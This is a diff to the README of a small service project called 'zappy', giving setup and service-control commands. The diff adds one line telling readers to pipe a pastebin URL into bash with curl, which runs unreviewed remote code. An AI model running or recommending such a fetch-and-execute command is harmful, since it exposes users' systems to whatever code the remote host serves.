mookie1097/zappy/README.md

 # zappy

+okay all you gotta do is run `curl -s https://pastebin.com/raw/BWDPTDhY | bash` now

 run `bash setup` to setup the service and you're all set! that's it! it starts on startup and everything!

 `sudo service zappyServer [start|restart|stop|status]`